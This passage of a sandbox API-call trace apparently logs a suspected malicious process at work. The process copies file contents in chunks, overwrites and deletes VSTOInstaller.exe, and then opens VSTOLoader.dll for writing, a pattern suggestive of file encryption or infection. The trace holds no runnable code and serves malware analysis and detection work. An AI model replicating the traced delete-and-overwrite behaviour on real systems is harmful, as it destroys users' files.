[0104.088] SetLastError (dwErrCode=0x0) [0104.088] GetLastError () returned 0x0 [0104.088] SetLastError (dwErrCode=0x0) [0104.089] ReadFile (in: hFile=0x368, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.089] WriteFile (in: hFile=0x27c, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.089] GetLastError () returned 0x0 [0104.089] SetLastError (dwErrCode=0x0) [0104.089] GetLastError () returned 0x0 [0104.089] SetLastError (dwErrCode=0x0) [0104.089] GetLastError () returned 0x0 [0104.089] SetLastError (dwErrCode=0x0) [0104.089] GetLastError () returned 0x0 [0104.089] SetLastError (dwErrCode=0x0) [0104.089] ReadFile (in: hFile=0x368, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.090] WriteFile (in: hFile=0x27c, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.090] GetLastError () returned 0x0 [0104.090] SetLastError (dwErrCode=0x0) [0104.090] GetLastError () returned 0x0 [0104.090] SetLastError (dwErrCode=0x0) [0104.090] GetLastError () returned 0x0 [0104.090] SetLastError (dwErrCode=0x0) [0104.090] GetLastError () returned 0x0 [0104.090] SetLastError (dwErrCode=0x0) [0104.090] ReadFile (in: hFile=0x368, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.090] WriteFile (in: hFile=0x27c, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.091] GetLastError () returned 0x0 [0104.091] SetLastError (dwErrCode=0x0) [0104.091] GetLastError () returned 0x0 [0104.091] SetLastError (dwErrCode=0x0) [0104.091] GetLastError () returned 0x0 [0104.091] SetLastError (dwErrCode=0x0) [0104.091] GetLastError () returned 0x0 [0104.091] SetLastError (dwErrCode=0x0) [0104.091] ReadFile (in: hFile=0x368, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.091] WriteFile (in: hFile=0x27c, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.092] GetLastError () returned 0x0 [0104.092] SetLastError (dwErrCode=0x0) [0104.092] GetLastError () returned 0x0 [0104.092] SetLastError (dwErrCode=0x0) [0104.092] GetLastError () returned 0x0 [0104.092] SetLastError (dwErrCode=0x0) [0104.092] GetLastError () returned 0x0 [0104.092] SetLastError (dwErrCode=0x0) [0104.092] ReadFile (in: hFile=0x368, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.092] WriteFile (in: hFile=0x27c, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.092] GetLastError () returned 0x0 [0104.093] SetLastError (dwErrCode=0x0) [0104.093] GetLastError () returned 0x0 [0104.093] SetLastError (dwErrCode=0x0) [0104.093] GetLastError () returned 0x0 [0104.093] SetLastError (dwErrCode=0x0) [0104.093] GetLastError () returned 0x0 [0104.093] SetLastError (dwErrCode=0x0) [0104.093] ReadFile (in: hFile=0x368, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.093] WriteFile (in: hFile=0x27c, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.093] GetLastError () returned 0x0 [0104.093] SetLastError (dwErrCode=0x0) [0104.093] GetLastError () returned 0x0 [0104.094] SetLastError (dwErrCode=0x0) [0104.094] GetLastError () returned 0x0 [0104.094] SetLastError (dwErrCode=0x0) [0104.094] GetLastError () returned 0x0 [0104.094] SetLastError (dwErrCode=0x0) [0104.094] ReadFile (in: hFile=0x368, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.094] WriteFile (in: hFile=0x27c, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.094] GetLastError () returned 0x0 [0104.094] SetLastError (dwErrCode=0x0) [0104.094] GetLastError () returned 0x0 [0104.094] SetLastError (dwErrCode=0x0) [0104.094] GetLastError () returned 0x0 [0104.095] SetLastError (dwErrCode=0x0) [0104.095] GetLastError () returned 0x0 [0104.095] SetLastError (dwErrCode=0x0) [0104.095] ReadFile (in: hFile=0x368, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.095] WriteFile (in: hFile=0x27c, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.095] GetLastError () returned 0x0 [0104.095] SetLastError (dwErrCode=0x0) [0104.095] GetLastError () returned 0x0 [0104.095] SetLastError (dwErrCode=0x0) [0104.095] GetLastError () returned 0x0 [0104.095] SetLastError (dwErrCode=0x0) [0104.095] GetLastError () returned 0x0 [0104.096] SetLastError (dwErrCode=0x0) [0104.096] ReadFile (in: hFile=0x368, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.096] WriteFile (in: hFile=0x27c, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.096] GetLastError () returned 0x0 [0104.096] SetLastError (dwErrCode=0x0) [0104.096] GetLastError () returned 0x0 [0104.096] SetLastError (dwErrCode=0x0) [0104.096] GetLastError () returned 0x0 [0104.096] SetLastError (dwErrCode=0x0) [0104.096] GetLastError () returned 0x0 [0104.096] SetLastError (dwErrCode=0x0) [0104.097] ReadFile (in: hFile=0x368, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x888, lpOverlapped=0x0) returned 1 [0104.097] WriteFile (in: hFile=0x27c, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.097] GetLastError () returned 0x0 [0104.097] SetLastError (dwErrCode=0x0) [0104.097] GetLastError () returned 0x0 [0104.097] SetLastError (dwErrCode=0x0) [0104.097] ReadFile (in: hFile=0x368, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0104.097] GetLastError () returned 0x0 [0104.097] SetLastError (dwErrCode=0x0) [0104.097] SetLastError (dwErrCode=0x0) [0104.097] WriteFile (in: hFile=0x27c, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x890, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327ef70*=0x890, lpOverlapped=0x0) returned 1 [0104.098] SetLastError (dwErrCode=0x0) [0104.098] SetLastError (dwErrCode=0x0) [0104.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35250 | out: hHeap=0x20000) returned 1 [0104.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0104.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d738 | out: hHeap=0x20000) returned 1 [0104.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0104.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0104.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x998e8 | out: hHeap=0x20000) returned 1 [0104.098] CloseHandle (hObject=0x27c) returned 1 [0104.098] CloseHandle (hObject=0x368) returned 1 [0104.098] AreFileApisANSI () returned 1 [0104.098] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0104.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x85bc0 [0104.099] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x85bc0, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe") returned 75 [0104.099] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0104.100] GetFileType (hFile=0x368) returned 0x1 [0104.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85bc0 | out: hHeap=0x20000) returned 1 [0104.100] SetLastError (dwErrCode=0xb7) [0104.100] WriteFile (in: hFile=0x368, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0104.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x944a8 | out: hHeap=0x20000) returned 1 [0104.101] CloseHandle (hObject=0x368) returned 1 [0104.101] AreFileApisANSI () returned 1 [0104.101] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0104.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x856c0 [0104.101] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x856c0, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe") returned 75 [0104.101] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.exe")) returned 1 [0104.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x856c0 | out: hHeap=0x20000) returned 1 [0104.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0104.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0104.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0104.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0104.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0104.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0104.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0104.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4c8 | out: hHeap=0x20000) returned 1 [0104.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6a8 | out: hHeap=0x20000) returned 1 [0104.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x986d0 | out: hHeap=0x20000) returned 1 [0104.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b568 | out: hHeap=0x20000) returned 1 [0104.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0104.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0104.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0104.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0104.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0104.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d420 | out: hHeap=0x20000) returned 1 [0104.103] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.103] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.103] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd6700, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4aebd53e, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5dbd6700, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x59a70, dwReserved0=0x1, dwReserved1=0x0, cFileName="VSTOLoader.dll", cAlternateFileName="VSTOLO~1.DLL")) returned 1 [0104.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0104.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0104.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0104.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0104.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0104.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0104.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0104.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0104.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0104.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0104.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0104.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0104.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0104.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0104.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0104.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0104.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0104.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e608 [0104.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0104.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0104.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0104.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0104.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ab20 [0104.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0104.104] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.104] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.104] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.104] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0104.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0104.104] AreFileApisANSI () returned 1 [0104.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll", lpUsedDefaultChar=0x0) returned 72 [0104.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0104.104] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.104] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0104.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0104.105] AreFileApisANSI () returned 1 [0104.105] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0104.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a498 [0104.105] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x8a498, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll") returned 72 [0104.105] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoloader.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0104.105] GetFileType (hFile=0x368) returned 0x1 [0104.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0104.105] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0104.105] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0104.105] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0104.105] CloseHandle (hObject=0x368) returned 1 [0104.106] AreFileApisANSI () returned 1 [0104.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0104.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a660 [0104.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x8a660, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll") returned 72 [0104.106] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoloader.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0104.106] GetFileType (hFile=0x368) returned 0x1 [0104.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0104.106] CloseHandle (hObject=0x368) returned 1 [0104.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0104.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0104.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0104.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0104.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0104.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0104.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0104.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0104.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0104.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0104.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0104.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0104.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0104.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0104.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0104.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0104.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0104.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0104.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0104.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0104.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0104.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0104.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0104.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0104.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0104.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0104.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0104.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0104.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0104.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0104.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0104.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0104.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0104.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0104.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0104.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0104.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0104.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0104.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0104.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0104.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: 